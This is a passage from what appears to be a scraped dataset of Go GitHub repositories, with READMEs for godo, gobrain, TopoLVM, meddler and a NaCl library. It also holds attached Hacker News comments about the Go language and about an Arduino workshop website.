variables may be set via key-value pairs as arguments to\ngodo. This feature was added to facilitate users on Windows.\n\n```sh\ngodo NAME=mario GOPATH=./vendor hello\n```\n\n### From source code\n\nTo specify whether to inherit from parent's process environment,\nset `InheritParentEnv`. This setting defaults to `true`.\n\n```go\ndo.InheritParentEnv = false\n```\n\nTo specify the base environment for your tasks, set `Env`.\nSeparate with whitespace or newlines.\n\n```go\ndo.Env = `\n GOPATH=.vendor::$GOPATH\n PG_USER=mario\n`\n```\n\nFunctions can add or override environment variables as part of the command string.\nNote that environment variables are set before the executable similarly to a shell;\nhowever, the `Run` and `Start` functions do not use a shell.\n\n```go\np.Task(\"build\", nil, func(c *do.Context) {\n c.Run(\"GOOS=linux GOARCH=amd64 go build\" )\n})\n```\n\nThe effective environment for exec functions is: `parent (if inherited) <- do.Env <- func parsed env`\n\nPaths should use `::` as a cross-platform path list separator. On Windows `::` is replaced with `;`.\nOn Mac and Linux `::` is replaced with `:`.\n\n### From godoenv file\n\nFor special circumstances where the GOPATH needs to be set before building the Gododir,\nuse a `Gododir/godoenv` file.\n\nTIP: Create `Gododir/godoenv` when using a dependency manager like `godep` that necessitates\nchanging `$GOPATH`.\n\n```\n# Gododir/godoenv\nGOPATH=$PWD/cmd/app/Godeps/_workspace::$GOPATH\n```\n", "readme_type": "markdown", "hn_comments": "wow if i search \"dash favicon\" it gives me the top voted SO post in a dropdownThis has been posted several times already: https://news.ycombinator.com/from?site=bluxte.netI wonder if in terms of GC Go still has an advantage over Java now that ZGC and Shenandoah are here. Though from what I understand you have to choose between GraalVM or one of the new GCs/some heavy reflection.> As you probably guessed, I have a love/hate relation with Go. 
Go is a bit like this friend that you like to hang out with because he's fun and great for small talk around beers, but that you find boring or painful when you want to have deeper conversations, and that you don't want to go on vacation with.That's a really good way of describing my feelings too, though I would describe it as a collegue more than a friend. I can see why this could be a good thing for people though, at some point you may want to do day to day work with a reliable collegue and not a friend.Should add to title (2018) - not current & not reflective of updates to APIFrom the horses mouth (Rob Pike) on why they chose to do what they did in Go.https://www.youtube.com/watch?v=rFejpH_tAHMOpinions on programming languages are like arseholes in that everyone has one. So I'm far less interested in hearing people intellectualise over what they perceive to be good or bad qualities of a particular language (otherwise known as arguing personal opinion as irrefutable fact) and far more interested in seeing what what cool projects people can make. After all, many of us managed to write some pretty awesome stuff in BASIC back in the 70s and 80s so there's really no excuse these days given the tooling and hardware we now have available.Just another guy speaking subjectively of something he barely know.I agree with this article to a surprising degree.Generally i find that people complain about other things that i don't care about but this article was spot on when it comes to my believes.I don\u2019t think it\u2019s fair to say they ignored advances in modern programming languages. There are opinionated reasons for the omission of generics and they do make sense in the overall architecture of the language. At the end of the day it\u2019s about trade offs and ultimately my opinion is that, having written a lot of both C# and Go, I can see the pros and cons of feature sets. Its about choice of tool for the solution in mind. I\u2019m happy with that.Buffering channels doesn't avoid deadlocks. As I understand it: buffering is a performance feature; if your code isn't correct without buffered channels, it isn't correct.> Up to recently there wasn't really an alternative in the space that Go occupies, which is developing efficient native executables without incurring the pain of C or C++.That's just plain not true. There are so many languages that compile to machine code. So, so many.I thought this was a superlative article, that mentions many gotchas that I haven't seen collected into one place in this way.I strongly recommend it.> The standard JSON encoder/decoder doesn't allow providing a naming strategy to automate the conversionThis is dangerous. You should be tagging all your fields even if the name matches exactly because, especially if inconsistently applied, someone might not realize that they are changing public schema with a refactor. If tags are completely missing in your codebase, you have to research every single type to determine if it gets serialized to JSON somewhere (good luck).Avoiding magic is a feature.One of the changes no one seems to be talking about is in leadership. Rob, Robert, and Ken would agree on a feature going into Go before it did. Now Russ Cox is in sole control of the leadership. This is happening at a point when work such as Go 2 and vgo are happening.From a previous Go blog post by the same author:Go decided to use a foreign syntax to C++, C and Java programmers. 
They borrows forward declarations from BASIC (yep, you heard me rightBASIC), creating declarations that are backwards from what weve been using for close to 20 years\"Yep, you heard me right... BASIC\". Consider carefully how seriously you want to take this blog.It's worth noting that this post is from December 2009.Somebody criticizing a language he freely admits to never having used.Nothing interesting to see here.Ok, I will do this one more time.The authors of go come from my generation. Back in those days, the term \"Systems Programming\" meant something different than what wikipedia, and probably most everyone today thinks of it.Systems Programming in those days meant writing compilers, text processors, unix command line programs. It did not then mean programming an operating system, or anything near hard real-time.Not a very high quality article.Did the author change the title? It now reads \"Google Go: Good for what?\", although the article (or, for that matter, the link) still quite clearly suggests (and explicitly says at the end) that the answer is 'nothing'.A gross and incorrect generalization. It should have been:Go: Good here, bad there.Go is a young language with a growing community that should only get better as more minds come to it.For me it's very accessible for rapidly developing heavy-lifting tools, in particular networking tools. It's not the only language but it's served me well when I've reached for it.\"Id say there are plenty of non-starters to keep Go out of the application programming space.\"God, I've got tired of all desktop applications written in python, they're soo slow. I hope Go gets used both in the application space and system space, so not just our systems are fast, the applications too.How good is the Go optimizer? I would guess that there's still a lot of room for improvement because that's not something you'd spend a lot of time on early in the life of a language.I'm genuinely curious - Scala is faster and better performant, what is there in GO that there isn't in Scala? I mean, if you were to build a highly scalable web app, why would you choose one over the other? Any thoughts??The argument here doesn't seem to be whether or not Go is a good programming language (what I would describe as what it's good for), but rather whether it will become popular.One has very little to do with the other.If you\u2019re a C/C++ programmer where you\u2019re already at 100/100 on the above chart, where is your motive to switch here?Someone a little biased here? That scale doesn't even mention concurrency, compilation speed, and duck typing.In other words: here's some attributes, all of which C++ is \"good at.\" These are the only attributes against which we should measure systems programming.I think assembly has C++ beat on a lot of those, yet C++ has the top score. 
Hmmm.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goml/gobrain", "link": "https://github.com/goml/gobrain", "tags": [], "stars": 535, "description": "Neural Networks written in go", "lang": "Go", "repo_lang": "", "readme": "# gobrain\n\nNeural Networks written in go\n\n[![GoDoc](https://godoc.org/github.com/goml/gobrain?status.svg)](https://godoc.org/github.com/goml/gobrain)\n[![Build Status](https://travis-ci.org/goml/gobrain.svg?branch=master)](https://travis-ci.org/goml/gobrain)\n\n## Getting Started\nThe version `1.0.0` includes just basic Neural Network functions such as Feed Forward and Elman Recurrent Neural Network.\nA simple Feed Forward Neural Network can be constructed and trained as follows:\n\n```go\npackage main\n\nimport (\n\t\"github.com/goml/gobrain\"\n\t\"math/rand\"\n)\n\nfunc main() {\n\t// set the random seed to 0\n\trand.Seed(0)\n\n\t// create the XOR representation patter to train the network\n\tpatterns := [][][]float64{\n\t\t{{0, 0}, {0}},\n\t\t{{0, 1}, {1}},\n\t\t{{1, 0}, {1}},\n\t\t{{1, 1}, {0}},\n\t}\n\n\t// instantiate the Feed Forward\n\tff := &gobrain.FeedForward{}\n\n\t// initialize the Neural Network;\n\t// the networks structure will contain:\n\t// 2 inputs, 2 hidden nodes and 1 output.\n\tff.Init(2, 2, 1)\n\n\t// train the network using the XOR patterns\n\t// the training will run for 1000 epochs\n\t// the learning rate is set to 0.6 and the momentum factor to 0.4\n\t// use true in the last parameter to receive reports about the learning error\n\tff.Train(patterns, 1000, 0.6, 0.4, true)\n}\n\n```\n\nAfter running this code the network will be trained and ready to be used.\n\nThe network can be tested running using the `Test` method, for instance:\n\n```go\nff.Test(patterns)\n```\n\nThe test operation will print in the console something like:\n\n```\n[0 0] -> [0.057503945708445] : [0]\n[0 1] -> [0.930100635071210] : [1]\n[1 0] -> [0.927809966227284] : [1]\n[1 1] -> [0.097408795324620] : [0]\n```\n\nWhere the first values are the inputs, the values after the arrow `->` are the output values from the network and the values after `:` are the expected outputs.\n\nThe method `Update` can be used to predict the output given an input, for example:\n\n```go\ninputs := []float64{1, 1}\nff.Update(inputs)\n```\n\nthe output will be a vector with values ranging from `0` to `1`.\n\nIn the example folder there are runnable examples with persistence of the trained network on file.\n\nIn example/02 the network is saved on file and in example/03 the network is loaded from file.\n\nTo run the example cd in the folder and run\n\n\tgo run main.go\n\n## Recurrent Neural Network\n\nThis library implements Elman's Simple Recurrent Network.\n\nTo take advantage of this, one can use the `SetContexts` function.\n\n```go\nff.SetContexts(1, nil)\n```\n\nIn the example above, a single context will be created initialized with `0.5`. It is also possible\nto create custom initialized contexts, for instance:\n\n```go\ncontexts := [][]float64{\n\t{0.5, 0.8, 0.1}\n}\n```\n\nNote that custom contexts must have the same size of hidden nodes + 1 (bias node),\nin the example above the size of hidden nodes is 2, thus the context has 3 values.\n\n## Changelog\n* 1.0.0 - Added Feed Forward Neural Network with contexts from Elman RNN\n\n", "readme_type": "markdown", "hn_comments": "BTW, the first event you do is always the hardest- remember Michael Arrington had the first TecCrunch meetups in his backyard. 
Provide a quality event regardless of size and build on its success for your next oneSecond time typing this, may have missed something. Got an expired link message.USP - Unique Selling Proposition. Why you? What pain are you solving? What are they getting?The very first thing should be:Come to a four hour workshop and learn how to program an open-source prototyping board and interface with sensors or LEDs. When you leave this workshop, you'll be able to control an LED, read a sensor and control a device from your computer. Don't have an Arduino? You can borrow one or buy one from us.The first thing I read should tell me precisely what you're offering - at that point, I need to know more details.If you're looking for 18-30, you're probably exposing them to technology they may not have heard of. Why should they be there? Learn hardware, learn programming, learn some basic electronics, learn hardware interfaces, etc.You should attend if you want to: learn to control an external device from your computer, want to control a series of LEDS based on inputs from sensors, etc.At this point, you've hit them with the first paragraph that tells them what the expectations are and what they're going to learn. Now, you need to describe What an Arduino is, the workshop you're putting on, etc.* utensil misspelledMake a list of the development environment requirements, libraries that they may want to have handy, etc. You may have this in the confirmation email, I don't know. You want to have a pre-check to make sure they all have what they need - i.e. if you haven't worked with Arduino, show up 30 minutes ahead, we'll plug in an arduino, load a quick program and make sure it builds and runs. You don't want the first 45 minutes spent trying to debug and diagnose getting them working.I believe for the event price, you're outside impulse purchases and you had too short a time from announce to workshop. I know you built it up in a number of the Hack and Tells, but, from presented concept to event, I think your timetable was too short - and is scheduled on an already busy (potentially expensive) weekend for some potential clients. That said, are vistors from out of town potentially interested in this versus the weekend on the beach in SoBe? Cross promotion could work, but, that makes for one very expensive weekend for part of your target demographic.Referrals work, are hard to track, should be part of the event management side.For the Arduino thing we talked about, I suspected based on equipment costs that I would need a 3-4 month announce to event and I still felt that would be cutting it close.Alumni, college groups, obviously those in computer or engineering classes may be interested. I would think with your connections, you may have already covered this.Find potential meetup groups that have some crossover. Neil is part of a hardware meetup - they may know students, etc. Perhaps the Android User Group (since there is an ADK that uses arduino, there might be some crossover).Ironically, I'm completely FUBARing my metrics by posting this, but I feel I've collected a decent sample to justify the value I'd be getting. But, if you get this far and want to help, please use these links so I can segment this traffic from my results.http://hackthisarduino.com/?hn=truehttp://hackthisarduino-hn.eventbrite.com/Anyone that puts themselves out there gets respect in my book.I think the site looks good and Arduino is super cool- it is something on my wishlist of fun things to do when I have some free time. 
Robots rule and Arduino chips seem to be in lots of them.If you are ever interested in coverage of your event (and we can get a writer where you are to go) its exactly the type of story we'd run on http://tech.li Feel free to reach out to us and best of luckFirst off, a thousand apologies - I went to your site before I read your reply. Consequently, you'll have a visitor from Regina, Saskatchewan polluting your results....I'm going to start by talking about some things you are doing extremely well:1. Great work coming here and asking for feedback. That takes a whole lot of courage!2. I love how deeply you are dissecting your own work - you've got a great attitude!And now for some general questions:1. Are you sure there is actually demand for this? I know that this is the ugliest question to ask (and the ugliest answer to ponder), but I suggest that you start here.2. Are you sure that the people who you think will be most interested (males between 18 - 30) are actually interested enough in this to convert? Have you ever thought of targeting some retired people (especially engineers)? As an example, I know an engineer who just retired who would sign up for this in a second (if he lived in South Florida)And finally for some criticism:1. I really like your website, but I have some problems with the text. While the writing itself is great, I question whether 12px helvetica was the correct choice. I also wonder whether your conversion rate wouldn't improve if you increased the line spacing and decreased the total amount of text on the homepage. With the web, the more words you have the lower the chance that anyone will actually read all of them!2. I question the information flow - if I were in your shoes, I'd likely design the information flow around a 'what is Arduino - what can I do with it? - why should I learn about it?' pattern. Might be worth doing a split test to see if that sort of flow has a higher conversion rate.3. Here's a picky little thing that I only noticed because I'm a little obsessive compulsive about such things. Consider this scenario:- I live in South Florida (I wish) and arrive on your website.- I get down to the bottom and decide, \"This sounds cool.\"- I decide I want to sign up for the newbie package, so I click \"Signup Now\" (below the newbie package).- I arrive on the Eventbrite page and discover that 'newbie package' has a quantity of zero.Now I'm in some trouble. I can't remember whether I wanted the newbie package, the auditor package or the loaner package. Do I hit back? Will that mess everything up? Hmmm...I wonder what is happening on Hacker News....All in all, great work throwing this event and if I lived closer, I'd definitely take it. I hope some of this helps!!Overall I think the site looks great. Here is a couple things I would at least A/B test:* Putting the prices on the page. I hate not knowing how much something is going to cost and I think it can surprise people when they click through.* Your linked slideshow is okay, but I think it might be beyond a lot of the audience that you want to reach. I would scrap it and...* I think you need to add an example project or two about what you can do with the Arduino (like maybe this one - http://j4mie.org/blog/how-to-make-a-physical-gmail-notifier/). As a software guy this would \"sell\" me.Good luck with it! 
I think you're onto a great idea and I like the \"loan\" option to allow people to just play with one.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "topolvm/topolvm", "link": "https://github.com/topolvm/topolvm", "tags": ["kubernetes", "csi", "lvm2"], "stars": 535, "description": "Capacity-aware CSI plugin for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "![TopoLVM logo](./docs/img/TopoLVM_logo.svg)\n[![GitHub release](https://img.shields.io/github/v/release/topolvm/topolvm.svg?maxAge=60)][releases]\n[![Main](https://github.com/topolvm/topolvm/workflows/Main/badge.svg)](https://github.com/topolvm/topolvm/actions)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/topolvm/topolvm?tab=overview)](https://pkg.go.dev/github.com/topolvm/topolvm?tab=overview)\n[![Go Report Card](https://goreportcard.com/badge/github.com/topolvm/topolvm)](https://goreportcard.com/badge/github.com/topolvm/topolvm)\n\nTopoLVM\n=======\n\nTopoLVM is a [CSI][] plugin using LVM for Kubernetes.\nIt can be considered as a specific implementation of [local persistent volumes](https://kubernetes.io/docs/concepts/storage/volumes/#local) using CSI and LVM.\n\n- **Project Status**: Testing for production\n- **Conformed CSI version**: [1.5.0](https://github.com/container-storage-interface/spec/blob/v1.5.0/spec.md)\n\nOur supported platform are:\n\n- Kubernetes: 1.25, 1.24, 1.23\n- Node OS: Linux with LVM2 (*1)\n- Filesystems: ext4, xfs, btrfs(experimental)\n- lvm version 2.02.163 or later (adds JSON output support)\n\n*1 The host's Linux Kernel must be v4.9 or later which supports `rmapbt` and `reflink`, if you use xfs filesystem with an official docker image.\n\nDocker images are available on [ghcr.io](https://github.com/orgs/topolvm/packages). \n**Please note that [the images on quay.io](https://quay.io/organization/topolvm) are deprecated and will be removed in the future.**\n\nGetting started\n---------------\n\nA demonstration of TopoLVM running on [kind (Kubernetes IN Docker)][kind] is available at [example](example/) directory.\n\nFor production deployments, see [deploy/README.md](./deploy/README.md).\n\nUser manual is at [docs/user-manual.md](docs/user-manual.md).\n\n_Deprecated: If you want to use TopoLVM on [Rancher/RKE](https://rancher.com/docs/rke/latest/en/), see [docs/deprecated/rancher.md](docs/deprecated/rancher.md)._\n\nContributing\n------------\n\nTopoLVM project welcomes contributions from any member of our community. 
To get\nstarted contributing, please see our [Contributing Guide](CONTRIBUTING.md).\n\nScope\n-----\n\n### In Scope\n\n- [Dynamic provisioning](https://kubernetes-csi.github.io/docs/external-provisioner.html): Volumes are created dynamically when `PersistentVolumeClaim` objects are created.\n- [Raw block volume](https://kubernetes-csi.github.io/docs/raw-block.html): Volumes are available as block devices inside containers.\n- [Topology](https://kubernetes-csi.github.io/docs/topology.html): TopoLVM uses CSI topology feature to schedule Pod to Node where LVM volume exists.\n- Extended scheduler: TopoLVM extends the general Pod scheduler to prioritize Nodes having larger storage capacity.\n- Volume metrics: Usage stats are exported as Prometheus metrics from `kubelet`.\n- [Volume Expansion](https://kubernetes-csi.github.io/docs/volume-expansion.html): Volumes can be expanded by editing `PersistentVolumeClaim` objects.\n- [Storage capacity tracking](https://github.com/topolvm/topolvm/tree/main/deploy#storage-capacity-tracking): You can enable Storage Capacity Tracking mode instead of using topolvm-scheduler.\n\n### Planned features\n\n- [Snapshot](https://kubernetes-csi.github.io/docs/snapshot-restore-feature.html): When we want it.\n\n### Deprecated features\n\n- [Pod security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) support is deprecated and will be removed when TopoLVM removes the support of Kubernetes < v1.25. This policy is same as Kubernetes.\n\nCommunications\n--------------\n\nIf you have any questions or ideas, please use [discussions](https://github.com/topolvm/topolvm/discussions).\n\nResources\n---------\n\n[docs](docs/) directory contains the user manual, designs and specifications, and so on.\n\nA diagram of components is available in [docs/design.md](docs/design.md#diagram).\n\nTopoLVM maintainers presented the motivation and implementation of TopoLVM at KubeCon Europe 2020: https://kccnceu20.sched.com/event/ZerD\n\nLicense\n-------\n\nThis project is licensed under [Apache License 2.0](LICENSE).\n\n[releases]: https://github.com/topolvm/topolvm/releases\n[CSI]: https://github.com/container-storage-interface/spec\n[kind]: https://github.com/kubernetes-sigs/kind\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "russross/meddler", "link": "https://github.com/russross/meddler", "tags": [], "stars": 534, "description": "conversion between sql and structs in go", "lang": "Go", "repo_lang": "", "readme": "Meddler [![Build Status](https://travis-ci.org/russross/meddler.svg?branch=master)](https://travis-ci.org/russross/meddler) [![GoDoc](https://godoc.org/github.com/russross/meddler?status.svg)](https://godoc.org/github.com/russross/meddler) [![Go Report Card](https://goreportcard.com/badge/github.com/russross/meddler)](https://goreportcard.com/report/github.com/russross/meddler)\n=======\n\nMeddler is a small toolkit to take some of the tedium out of moving data\nback and forth between SQL queries and structs.\n\nIt is not a complete ORM. 
Meddler is intended to be a lightweight way to add some\nof the convenience of an ORM while leaving more control in the hands of the\nprogrammer.\n\nPackage docs are available at:\n\n* http://godoc.org/github.com/russross/meddler\n\nThe package is housed on GitHub, and the README there has more info:\n\n* http://github.com/russross/meddler\n\nMeddler is currently configured for SQLite, MySQL, and PostgreSQL, but it\ncan be configured for use with other databases. If you use it\nsuccessfully with a different database, please contact me and I will\nadd it to the list of pre-configured databases.\n\n### DANGER\n\nMeddler is still a work in progress, and additional\nbackward-incompatible changes to the API are likely. The most recent\nchange added support for multiple database types and made it easier\nto switch between them. This is most likely to affect the way you\ninitialize the library to work with your database (see the install\nsection below).\n\nAnother recent update is the change to int64 for primary keys. This\nmatches the convention used in database/sql, and is more portable,\nbut it may require some minor changes to existing code.\n\n\nInstall\n-------\n\nThe usual `go get` command will put it in your `$GOPATH`:\n\n go get github.com/russross/meddler\n\nIf you are only using one type of database, you should set Default\nto match your database type, e.g.:\n\n meddler.Default = meddler.PostgreSQL\n\nThe default database is MySQL, so you should change it for anything\nelse. To use multiple databases within a single project, or to use a\ndatabase other than MySQL, PostgreSQL, or SQLite, see below.\n\nNote: If you are using MySQL with the `github.com/go-sql-driver/mysql`\ndriver, you must set \"parseTime=true\" in the sql.Open call or the\ntime conversion meddlers will not work.\n\n\nWhy?\n----\n\nThese are the features that set meddler apart from similar\nlibraries:\n\n* It uses standard database/sql types, and does not require\n special fields in your structs. This lets you use meddler\n selectively, without having to alter other database code already\n in your project. After creating meddler, I incorporated it into\n an existing project, and I was able to convert the code one\n struct and one query at a time.\n* It leaves query writing to you. It has convenience functions for\n simple INSERT/UPDATE/SELECT queries by integer primary key, but\n beyond that it stays out of query writing.\n* It supports on-the-fly data transformations. If you have a map\n or a slice in your struct, you can instruct meddler to\n encode/decode using JSON or Gob automatically. If you have time\n fields, you can have meddler automatically write them into the\n database as UTC, and convert them to the local time zone on\n reads. These processors are called \u201cmeddlers\u201d, because they\n meddle with the data instead of passing it through directly.\n* NULL fields in the database can be read as zero values in the\n struct, and zero values in the struct can be written as NULL\n values. This is not always the right thing to do, but it is\n often good enough and is much simpler than most alternatives.\n* It exposes low-level hooks for more complex situations. If you\n are writing a query that does not map well to the main helper\n functions, you can still get some help by using the lower-level\n functions to build your own helpers.\n\n\nHigh-level functions\n--------------------\n\nMeddler does not create or alter tables. It just provides a little\nglue to make it easier to read and write structs as SQL rows. 
Start\nby annotating a struct:\n\n``` go\ntype Person struct {\n ID int `meddler:\"id,pk\"`\n Name string `meddler:\"name\"`\n Age int\n salary int\n Created time.Time `meddler:\"created,localtime\"`\n Closed time.Time `meddler:\",localtimez\"`\n}\n```\n\nNotes about this example:\n\n* If the optional tag is provided, the first field is the database\n column name. Note that \"Closed\" does not provide a column name,\n so it will default to \"Closed\". Likewise, if there is no tag,\n the field name will be used.\n* ID is marked as the primary key. Currently only integer primary\n keys are supported. This is only relevant to Load, Save, Insert,\n and Update, a few of the higher-level functions that need to\n understand primary keys. Meddler assumes that pk fields have an\n autoincrement mechanism set in the database.\n* Age has a column name of \"Age\". A tag is only necessary when the\n column name is not the same as the field name, or when you need\n to select other options.\n* salary is not an exported field, so meddler does not see it. It\n will be ignored.\n* Created is marked with \"localtime\". This means that it will be\n converted to UTC when being saved, and back to the local time\n zone when being loaded.\n* Closed has a column name of \"Closed\", since the tag did not\n specify anything different. Closed is marked as \"localtimez\".\n This has the same properties as \"localtime\", except that the\n zero time will be saved in the database as a null column (and\n null values will be loaded as the zero time value).\n* You can set a default column name mapping by setting\n `meddler.Mapper` to a `func(s string) string` function. For\n example, `meddler.Mapper = meddler.SnakeCase` will convert field\n names to snake_case unless an explict column name is specified.\n\nMeddler provides a few high-level functions (note: DB is an\ninterface that works with a *sql.DB or a *sql.Tx):\n\n* Load(db DB, table string, dst interface{}, pk int64) error\n\n This loads a single record by its primary key. For example:\n\n ```go\n elt := new(Person)\n err := meddler.Load(db, \"person\", elt, 15)\n ```\n\n db can be a *sql.DB or a *sql.Tx. The table is the name of the\n table, pk is the primary key value, and dst is a pointer to the\n struct where it should be stored.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* Insert(db DB, table string, src interface{}) error\n\n This inserts a new row into the database. If the struct value\n has a primary key field, it must be zero (and will be omitted\n from the insert statement, prompting a default autoincrement\n value).\n\n ```go\n elt := &Person{\n Name: \"Alice\",\n Age: 22,\n // ...\n }\n err := meddler.Insert(db, \"person\", elt)\n // elt.ID is updated to the value assigned by the database\n ```\n\n* Update(db DB, table string, src interface{}) error\n\n This updates an existing row. It must have a primary key, which\n must be non-zero.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* Save(db DB, table string, src interface{}) error\n\n Pick Insert or Update automatically. 
If there is a non-zero\n primary key present, it uses Update, otherwise it uses Insert.\n\n Note: this call requires that the struct have an integer primary\n key field marked.\n\n* QueryRow(db DB, dst interface{}, query string, args ...interface{}) error\n\n Perform the given query, and scan the single-row result into\n dst, which must be a pointer to a struct.\n\n For example:\n\n ```go\n elt := new(Person)\n err := meddler.QueryRow(db, elt, \"select * from person where name = ?\", \"bob\")\n ```\n\n* QueryAll(db DB, dst interface{}, query string, args ...interface{}) error\n\n Perform the given query, and scan the results into dst, which\n must be a pointer to a slice of struct pointers.\n\n For example:\n\n ```go\n var people []*Person\n err := meddler.QueryAll(db, &people, \"select * from person\")\n ```\n \n* Scan(rows *sql.Rows, dst interface{}) error\n\n Scans a single row of data into a struct, complete with\n meddling. Can be called repeatedly to walk through all of the\n rows in a result set. Returns sql.ErrNoRows when there is no\n more data.\n\n* ScanRow(rows *sql.Rows, dst interface{}) error\n\n Similar to Scan, but guarantees that the rows object\n is closed when it returns. Also returns sql.ErrNoRows if there\n was no row.\n\n* ScanAll(rows *sql.Rows, dst interface{}) error\n\n Expects a pointer to a slice of structs/pointers to structs, and\n appends as many elements as it finds in the row set. Closes the\n row set when it is finished. Does not return sql.ErrNoRows on an\n empty set; instead it just does not add anything to the slice.\n\nNote: all of these functions can also be used as methods on Database\nobjects. When used as package functions, they use the Default\nDatabase object, which is MySQL unless you change it.\n\n\nMeddlers\n--------\n\nA meddler is a handler that gets to meddle with a field before it is\nsaved, or when it is loaded. \"localtime\" and \"localtimez\" are\nexamples of built-in meddlers. The full list of built-in meddlers\nincludes:\n\n* identity: the default meddler, which does not do anything\n\n* localtime: for time.Time and *time.Time fields. Converts the\n value to UTC on save, and back to the local time zone on loads.\n To set your local time zone, make sure the TZ environment\n variable is set when your program is launched, or use something\n like:\n\n ```go\n os.Setenv(\"TZ\", \"America/Denver\")\n ```\n\n in your initial setup, before you start using time functions.\n\n* localtimez: same, but only for time.Time, and treats the zero\n time as a null field (converts both ways)\n\n* utctime: similar to localtime, but keeps the value in UTC on\n loads. This ensures that the time is always converted to UTC on\n save, which is the sane way to save time values in a database.\n\n* utctimez: same, but with zero time means null.\n\n* zeroisnull: for other types where a zero value should be\n inserted as null, and null values should be read as zero values.\n Works for integer, unsigned integer, float, complex number, and\n string types. Note: not for pointer types.\n\n* json: marshals the field value into JSON when saving, and\n unmarshals on load.\n\n* jsongzip: same, but compresses using gzip on save, and\n uncompresses on load\n \n* gob: encodes the field value using Gob when saving, and\n decodes on load.\n\n* gobgzip: same, but compresses using gzip on save, and\n uncompresses on load\n \n
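As a quick, illustrative sketch (the `Account` struct, its column names, and the values\nbelow are invented for this example, but the tags and helpers are the ones documented\nabove), the json and utctimez meddlers can be combined in one struct and written out\nwith Save:\n\n```go\ntype Account struct {\n    ID       int               `meddler:\"id,pk\"`\n    // the json meddler stores this map as a JSON string in the prefs column\n    Prefs    map[string]string `meddler:\"prefs,json\"`\n    // utctimez saves the time as UTC and writes the zero time as NULL\n    ClosedAt time.Time         `meddler:\"closed_at,utctimez\"`\n}\n\nacct := &Account{Prefs: map[string]string{\"theme\": \"dark\"}}\n// Save inserts here because acct.ID is zero; with a non-zero ID it would update instead\nerr := meddler.Save(db, \"account\", acct)\n```\n\n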
You can implement custom meddlers as well by implementing the\nMeddler interface. See the existing implementations in meddler.go for\n examples.\n\n\nWorking with different database types\n-------------------------------------\n\nMeddler can work with multiple database types simultaneously.\nDatabase-specific parameters are stored in a Database struct, and\nstructs are pre-defined for MySQL, PostgreSQL, and SQLite.\n\nInstead of relying on the package-level functions, use the method\nform on the appropriate database type, e.g.:\n \n```go \nerr = meddler.PostgreSQL.Load(...)\n```\n\ninstead of\n\n```go\nerr = meddler.Load(...)\n```\n\nOr to save typing, define your own abbreviated name for each\ndatabase:\n\n```go\nms := meddler.MySQL\npg := meddler.PostgreSQL\nerr = ms.Load(...)\nerr = pg.QueryAll(...)\n```\n\nIf you need a different database, create your own Database instance\nwith the appropriate parameters set. If everything works okay,\nplease contact me with the parameters you used so I can add the new\ndatabase to the pre-defined list.\n\n\nLower-level functions\n---------------------\n\nIf you are using more complex queries and just want to reduce the\ntedium of reading and writing values, there are some lower-level\nhelper functions as well. See the package docs for details, and\nsee the implementations of the higher-level functions to see how\nthey are used.\n\n\nLicense\n-------\n\nMeddler is distributed under the BSD 2-Clause License. If this\nlicense prevents you from using Meddler in your project, please\ncontact me and I will consider adding an additional license that is\nbetter suited to your needs.\n\n> Copyright \u00a9 2013 Russ Ross.\n> All rights reserved.\n> \n> Redistribution and use in source and binary forms, with or without\n> modification, are permitted provided that the following conditions\n> are met:\n> \n> 1. Redistributions of source code must retain the above copyright\n> notice, this list of conditions and the following disclaimer.\n> \n> 2. Redistributions in binary form must reproduce the above\n> copyright notice, this list of conditions and the following\n> disclaimer in the documentation and/or other materials provided with\n> the distribution.\n> \n> THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n> \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n> LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n> FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n> COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n> INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n> BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n> LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n> CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n> LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n> ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n> POSSIBILITY OF SUCH DAMAGE.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kevinburke/nacl", "link": "https://github.com/kevinburke/nacl", "tags": ["golang", "nacl", "security", "secretbox", "curve25519"], "stars": 534, "description": "Pure Go implementation of the NaCL set of API's", "lang": "Go", "repo_lang": "", "readme": "# go-nacl\n\n[![GoDoc](https://godoc.org/github.com/kevinburke/nacl?status.svg)](https://godoc.org/github.com/kevinburke/nacl)\n\nThis is a pure Go implementation of the API's available in NaCL:\nhttps://nacl.cr.yp.to. 
